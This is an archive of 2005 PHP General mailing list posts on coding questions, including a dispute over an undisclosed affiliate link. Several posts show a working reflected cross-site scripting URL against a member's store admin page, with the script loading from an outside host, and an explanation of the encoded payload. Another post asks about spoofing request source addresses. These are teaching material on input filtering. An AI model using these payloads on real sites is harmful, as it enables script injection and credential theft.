(999) 960.7994 Cel: 9931-6 -- Stephen Johnson The Lone Coder [EMAIL PROTECTED] http://www.thelonecoder.com *Continuing the struggle against bad code* -- -- Stephen Johnson The Lone Coder [EMAIL PROTECTED] http://www.thelonecoder.com *Continuing the struggle against bad code* -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
snip Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. /snip reply I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' /reply Dude, calm down, dont get your underwear in a knot, I was not attacking you or saying your intentions were not good or that the service being offered on that page is not exactly what Andy needslet me explain, you wrote: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money we like to help each other out on the listbut just come out and say it then let the receiver decide if the link is on the level or not. -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' - Well, all i can say is, if my little email bugged you, you either get bugged very easily or you know I'm right! (I too sometimes get bugged when people point something out and i am wrong and they are right) and for the record: I never said you are not helping Andy... but if you dont come clean and just add a simple line like: PS: I really like that site so i am an affilate of theirs, my affilate link is on the URL i sent you or something like that people wont have to doubt your motives... Or maybe I am just a goody two shoes who says itand Jay Blanchard when someone asks about templates and template engines and Chris when someone asks about SQL injections...and ...oops, too many names. Cheers, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.0.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] rawurldecode problems
I'm using the rawurldecode() function to try and polish up some data I get from a parameter I use the function below and this is what it does. It's as-if it only unencodes the last part. Anybody have ideas on what I'm doing wrong? $order = rawurldecode($HTTP_GET_VARS[x]); 3445%252520Causeway%252520Boulevard%252520Limited%252520Partnership%25250ACape%2520May%2520Apartments,%2520LLC%250AElco%20Housing%20Partners,%20LLC%0A 3445%20Causeway%20Boulevard%20Limited%20Partnership%0ACape May Apartments, LLC Elco Housing Partners, LLC it SHOULD look like this: 3445 Causeway Boulevard Limited Partnership Cape May Apartments, LLC Elco Housing Partners, LLC If this helps... the original long string was written with \n between each value before it was encoded. Does that have anything to do with it?
[PHP] Moving PEAR installation (for self-contained class library)
Hi, I have a PEAR-related question. My class library using some PEAR packages, and I would like to make it self-contained, i.e. to be able to move it to a server (for example MacOS X) which do not have (and will not require) installation of any PEAR package(s). What I would like to do is just to copy whole PEAR directory from the /usr/share/php5 in the corresponding subdir of my class library. The question is - how to make this work transparently. What global php_ini variables need to be changed? Just ¨include_path¨ or anything else? Thanks in advance for any suggestion(s). *** with best regards *** Andrei Verovski (aka MacGuru) *** Mac, Linux, DTP, Programming Web Site *** *** http://snow.prohosting.com/guru4mac/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On 5/27/05, Manuel Lemos [EMAIL PROTECTED] wrote: Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. We generally like to know however if there is potential bias in links we are being given. It gives us a better idea how to treat the advice you are giving. I'm sure the site is on the level, but when you don't mention that you potentially get paid for putting that link there(through possible referals), and we find out it makes us suspicious as to why you failed to mention it. OTOH, I think a good few of us here, would like to support each other by choosing services that each other get paid for, provided they're up front with us. Based on other posts here, I don't think you meant to deceive. I'm not attacking, or giving out to you. I'm just saying this FYI. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly! I wouldn't consider his post to be bugging you(unless he repeats it, or has already posted a similar message before). Personally however I appreciate being made aware of the issue. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how to convert char into number
What function do I use to convert an ASCII character into it's equivalent number? http://us2.php.net/ord int ord ( string string ) Returns the ASCII value of the first character of string. This function complements chr(). -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 4:15 PM said: He was apparently doing something along the lines of: foreach($_GET as $key=$val) { echo EOL input type=hidden name=$key value=$val EOL; } Probably just a lazyness thing. Generally you will want to keep track of which query args are actually valid and not just parrot whatever you get back to the user. Oh I see. Or if you are going to do do it this way, recognize that you have to filter/encode both the query arg names and the values. One question. (Because I'm a lame brain when it comes to security as I'm not good at imagining how things can be exploited): Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Returned mail: Data format error
ALERT! This e-mail, in its original form, contained one or more attached files that were infected with a virus, worm, or other type of security threat. This e-mail was sent from a Road Runner IP address. As part of our continuing initiative to stop the spread of malicious viruses, Road Runner scans all outbound e-mail attachments. If a virus, worm, or other security threat is found, Road Runner cleans or deletes the infected attachments as necessary, but continues to send the original message content to the recipient. Further information on this initiative can be found at http://help.rr.com/faqs/e_mgsp.html. Please be advised that Road Runner does not contact the original sender of the e-mail as part of the scanning process. Road Runner recommends that if the sender is known to you, you contact them directly and advise them of their issue. If you do not know the sender, we advise you to forward this message in its entirety (including full headers) to the Road Runner Abuse Department, at [EMAIL PROTECTED] ã¶;%NüîV´ÙRúI®3Î(¨È» ñî4ØÍR-ûÎSE| ¡ ò0FÒKÚÏ)JøÍàÉ«)²5r72~] .{pØÍÝ)¹xص2¦×}ÚÄaùJ¨*Ó3Òª5ÄáOÅöpùR¸ r¨Q1ûKËðzù4ʾbí4ºAàı,Uɱ¥Ëýï«èûw» ý{¼Ñ²¾Êsäþþ±[ ^4ç£7YųS¶ËJ DàHà3 6 file attachment: letter.zip This e-mail in its original form contained one or more attached files that were infected with the [EMAIL PROTECTED] virus or worm. They have been removed. For more information on Road Runner's virus filtering initiative, visit our Help Member Services pages at http://help.rr.com, or the virus filtering information page directly at http://help.rr.com/faqs/e_mgsp.html. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Recursion: Ugh!
Steve Brown mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 2:17 PM said: So in your case, if you wanted to create a new item in the category Round, you would first have to navigate to Food Vegetables Round, then create the new item. This may seem more complicated, but think about how much time your users are going to spend scrolling through a list of lots of categories compared to this approach. Oh ok. I understand what you're saying. It's like dmoz.org correct? This is a good idea (and one that I might adopt in cart I've built for the company I work for). But for the current project I'm working on (a personal web based basic financial app [i.e. I need to make a budget and keep track of it.]) I can see that kind of category navigation being tedious. Reason being, I personally save all the receipts for every transaction I make. I will then enter these receipts into the application one at a time. But if I've got 25+ receipts to enter from one week I'm not going to want to navigate through the category tree 25 times. But in any case, this is mostly off topic at this point. Maybe all future correspondence on this should be sent off list. Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Compiling Phpcap
I am trying to compile phpcap-0.2e with php-4.2.3 and get the following configure error: ./configure: line 52860: syntax error near unexpected token `PHP_NEW_EXTENSION(phpcap,' ./configure: line 52860: ` PHP_NEW_EXTENSION(phpcap, phpcap.c, $ext_shared)' The phpcap INSTALL file show php-4.3.1 being used for installation. Is there a work around for configuring phpcap-0.2e with php-4.2.3? Thank you for your assistance. Respectfully, Gary -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Chris W. Parker wrote: One question. (Because I'm a lame brain when it comes to security as I'm not good at imagining how things can be exploited): Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? As long as you recognize that you need to filter things appropriately it doesn't really matter. Application-level Web security is not that hard. There is just 1 rule to remember. Never trust anything that comes from the user. That includes all GET, POST and Cookie data, which most people understand. But it also includes the User Agent, the Referer, and even the Host header. Anything that comes across the wire in the request can be hacked. If you have written something and you'd like me to take a quick look for any obvious exploits, feel free to mail me privately. If your site requires a login, you can send me a test login if you want so I can dig a bit deeper, otherwise I will still prod it from the outside. I'm not going to hack into your server in any way, just prod your web application a little bit with various web requests. Server-level security is a completely different kettle of fish which mostly comes down to keeping up to date with OS-level security updates. So far about 80% of sites I have looked at have had pretty serious issues. Like that www.vlaamse-kern.com one where you could trick people into sending you their usernames and passwords pretty easily. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how to convert char into number
On Wed, 2005-05-25 at 16:11, Jeremy Reynolds wrote: What function do I use to convert an ASCII character into it's equivalent number? -- Sorry, I think my spam filters got any responses. If you replied, could you please resend it to me? ord() -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] fopen for http://
On 5/27/05, Jay Paulson [EMAIL PROTECTED] wrote: Hello all- I was wondering if anyone knew of a way to call a web site using fopen. Let me tell you how things are set up and what I'm trying to do. I can call fopen to read a site and then echo it back out. That's not a problem. The problem I run into is when I try to go to a restricted area of a site. Define restricted area. How is it restricted? Using Login Forms? Using HTTP Authentication? Using .htaccess to filter using IP Addresses? For example, in my Apache httpd.conf file I have it set up to where I have a directory that is only accessible from certain IP addresses, one of which is 127. (the localhost). The script I'm running is located on the server and the web site I'm trying to access via fopen() is on the same server. Therefore, I'm thinking that the php script should have access to read the site's restricted directory. For some reason it does not have access. What errors are you getting? Do you get the same errors, when you access the site using a Browser? Are you accessing the site via someurl.com or localhost? If you're using someurl.com, and the ip address of someurl.com is 1.2.3.4, then you'll need to add 1.2.3.4 to the list of allowed ip addresses. Your server probably doesn't recognise that 1.2.3.4 is actually the same as 127.x.x.x when deciding to allow or deny. I was wondering if there was a way around this or am I just doomed to never be able to access the directory via fopen(http://someurl.com/somedirectory,r;); ?? Thanks. Jay -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] fopen for http://
I was wondering if anyone knew of a way to call a web site using fopen. Let me tell you how things are set up and what I'm trying to do. I can call fopen to read a site and then echo it back out. That's not a problem. The problem I run into is when I try to go to a restricted area of a site. For example, in my Apache httpd.conf file I have it set up to where I have a directory that is only accessible from certain IP addresses, one of which is 127. (the localhost). The script I'm running is located on the server and the web site I'm trying to access via fopen() is on the same server. Therefore, I'm thinking that the php script should have access to read the site's restricted directory. For some reason it does not have access. I was wondering if there was a way around this or am I just doomed to never be able to access the directory via fopen(http://someurl.com/somedirectory,r;); ?? Why can't you just do... fopen(http://127.0.0.1/somedirectory;, r); ? Odds are when you do it the other way your IP address is *NOT* 127.0.0.1, but whatever your Internet IP address is. -philip -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how to convert char into number
On Wed, 2005-05-25 at 16:01, Jeremy Reynolds wrote: What function do I use to convert an ASCII character into it's equivalent number? ord() -- s/:-[(/]/:-)/g BrianGnuPG - KeyID: 0x04A4F0DC | Key Server: pgp.mit.edu == gpg --keyserver pgp.mit.edu --recv-keys 04A4F0DC Key Info: http://gfx-design.com/keys Linux Registered User #339825 at http://counter.li.org -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Chris W. Parker wrote: Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? He was apparently doing something along the lines of: foreach($_GET as $key=$val) { echo EOL input type=hidden name=$key value=$val EOL; } Probably just a lazyness thing. Generally you will want to keep track of which query args are actually valid and not just parrot whatever you get back to the user. Or if you are going to do do it this way, recognize that you have to filter/encode both the query arg names and the values. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On Saturday 28 May 2005 01:05, Chris W. Parker wrote: Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? In this example, what was going on was that I captured the parameters passed on the url, and included them as hiddens in a form. Since it was not properly escaped, the attack succeeds by inserting a variable with value script type=text/javascript src=somewhere/script But then url encoded: %22%3E+%3Cscript+type%3D%09ext%2Fjavascript+src%3D%22somewhere%22%3E%3C%2Fscript%3E Which translates in the html document to: form... input type=hidden name=script type=text/javascript src=somewhere/script ... -- Registered Linux User Number 379093 -- --BEGIN GEEK CODE BLOCK- Version: 3.1 GAT/O/E$ d-(---)+ s:(+): a--(-)? C$(+++) UL$ P-(+)++ L+++$ E---(-)@ W++$ !N@ o? !K? W--(---) !O !M- V-- PS++(+++) PE--(-) Y+ PGP++(+++) t+(++) 5-- X++ R*(+)@ !tv b-() DI(+) D+(+++) G(+) e$@ h++(*) r--++ y--() -- ---END GEEK CODE BLOCK-- -- Check out these few php utilities that I released under the GPL2 and that are meant for use with a php cli binary: http://www.vlaamse-kern.com/sas/ -- -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Include Remote Content as REMOTE_ADDR of Browser
Ryan Grange wrote: Gary C. New wrote: Is there a quick and dirty way to include, file, or fsockopen content from a remote server and make it appear as though the request was straight from the browser's remote address? Thank you for your assistance. Respectfully, Gary I believe you would in effect by spoofing the source of the request. The problem is that the server you request from would respond to the wrong IP and the browser at the client wouldn't be accepting any data from the remote server for display. I figured that might be the case. I guess half a solution is better than no solution at all. Would it be possible to engineer a man-in-the-middle situation between the browser, server, and remote server? I have been looking at Phpcap as a possible solution. It seems possible to engineer the non-returnable package (half solution) situation. But I wouldn't know where to begin to attempt the man-in-the-middle situation or if it is even possible. Thank you for your response. Respectfully, Gary -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hi, I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! My bad there, while typeing the first email I meant if he signs up for a paid plan instead I wrote if he signs up... If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said would be paying he extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. You keep saying distorting the facts, which is quite strange because this whole discussion took a turn because you in a way distorted the facts by not telling the person you were helping that you may be making money off him without his knowledge. Andy never asked explicitly for a service that the referer would not gain anything True, but if want to play that game, he never mentioned that he was looking for someone to mention a site/resource where the referrer was gaining OR not gaining anything...which is kind of stupid because when we write to the list we dont think we are making a deal with the devil so we have to cover all points and angles. This is PHP (help) list, not a list on how to best write a help email so it would hold up in a court of law- I am not hiding anything as the affiliate id is quite visible in the URL Unfortunatly for you thats quite true...and thats how this whole thing turned because I saw it, but many people (maybe Andy too) dont know what it means when someone gives them a URL with an affiliate id tacked to the end of it, common decency is to tell the person that you have a connection with that site. I never denied that the URL contains my affiliate id. If you did you would be reay stupid, and nobody is accusing you of being that. - If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. Why? because they are being open,decent AND honest about it, see the If you buy the book using the links .you are helping to support parts? Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. And you tell me I am being ridiculous! clip Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! /clip People on this list are some of the best people I have even had the privilage of helping and being helped by...they are not really out to sucker anyone or for self gain..they help to help, no
Re: [PHP] Very odd (bug??) with arrays, objects, and serialize (please read!)
Philip Hallstrom wrote: Hi all - I came across a very odd bug in 4.3.10 (and 4.3.11). It's not in 4.3.4, and it's not in 5.0.4. looks like a problem related to copy-on-change strategy php uses (that is when a copy is made its only actually copied if and when you change the copy, until then its a really reference. if I understand it correctly) My understanding is that in 4.x objects are assigned by value. So, why in the first part of the code is the output of serialize() indicating a reference? This would suggest that objects are being copied by reference. But in the second when I change $ary[1]-name, the output of the serialize only changes the second element, not both. Also, changing $obj-name doesn't have any effect on $ary[0] or $ary[1]. Which would suggest that $ary[0] and $ary[1] are NOT the SAME thing. The output below is from 4.3.11. 4.3.4 does not have this problem and the serialize() output does not indicate any reference. In 5.0.4, the everything works like I'd expect it to since objects are assigned by reference. It's almost like $obj is partially being copied by reference and that serialize is picking up on that or something... Should I submit this as a bug? Am I missing something obvious? Here's the code: ?php $obj-name = Homer; $ary[] = $obj; $ary[] = $obj; $obj1-name = Homer; $ary[] = $obj1; print_r($ary); print(\n); print ( serialize($ary) ); print(\n\n---\n\n); unset($obj); unset($obj1); unset($ary); $obj-name = Homer; $ary[] = $obj; $ary[] = $obj; $obj1-name = Homer; $ary[] = $obj1; $ary[1]-name = Marge; print_r($ary); print(\n); print ( serialize($ary) ); ? Here's the output: Array ( [0] = stdClass Object ( [name] = Homer ) [1] = stdClass Object ( [name] = Homer ) [2] = stdClass Object ( [name] = Homer ) ) a:3:{i:0;O:8:stdClass:1:{s:4:name;s:5:Homer;}i:1;r:2;i:2;O:8:stdClass:1:{s:4:name;s:5:Homer;}} --- Array ( [0] = stdClass Object ( [name] = Homer ) [1] = stdClass Object ( [name] = Marge ) [2] = stdClass Object ( [name] = Homer ) ) a:3:{i:0;O:8:stdClass:1:{s:4:name;s:5:Homer;}i:1;O:8:stdClass:1:{s:4:name;s:5:Marge;}i:2;O:8:stdClass:1:{s:4:name;s:5:Homer;}} -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 05:30 PM Rory Browne said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. We generally like to know however if there is potential bias in links we are being given. There is nothing to be concerned about any bias because a) I am recommending a free service that anybody can try and evaluate and post an opinion, b) I said I tried it, it does what the original poster asked and nobody has demonstrated otherwise, c) the link is in plain text so that everybody can see the referral id, so I am not hiding anything, if I had I would not be here clarifying the facts. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Rusty's Magpie mod to cache to database
Has anyone ever used Russ Johnston's modified Mapgpie RSS to cache to a database? I'm trying to, but no records are being written to the database - just wondering if anyone's had success. Thanks. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. Get real, you are being ridiculous! Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' - Well, all i can say is, if my little email bugged you, you either get bugged very easily or you know I'm right! Look, you challenged my credibility by distorting the facts. Of course that bugs me because for 8 years I have been participating in PHP mailing lists helping people leading to solutions to the problems that they pose, and your attitude is misleading people into believing that I am not helping them. You have caused such confusion that Andy, the original poster, have written me privately telling that he thought that the link that I suggested pointed to a site of mine where I was selling security auditing services, when in fact the only person that doing that in this thread was Chris Shiflet. I just recommended a service that I tried, and so I have first hand experience to comment about, unlike you that not only just caused confusion but also did not offer any solution to the problem posed by Andy. Basically you are not helping because all you did is to bug somebody that tried to help. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] printf() in a variable, or alternative to printf() - SOLVED
Thx, It's amazing how sleep helps. Couldn't believe that when I read sprintf() I didn't see how it did exactly what I was looking for. Thx all mayo -Original Message- From: mayo [mailto:[EMAIL PROTECTED] Sent: Thursday, May 26, 2005 11:35 PM To: php-general@lists.php.net Subject: [PHP] printf() in a variable, or alternative to printf() I need to be able to format data. Printf() is perfect because I need a certain amount of characters (30 for address). However I need this formatted data to be inside a file that's fwrite() and then FTPed to a distributor who will parse it and input into their database. printf(% 4d,$orderID[0]); does not work in $thisContent= data . moredate . evenmoredata . ; In effect I need the output of printf() to be placed inside a variable and I don't see how to do that. Str_pad(), of course, does not work. Thx for any hints. mayo -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php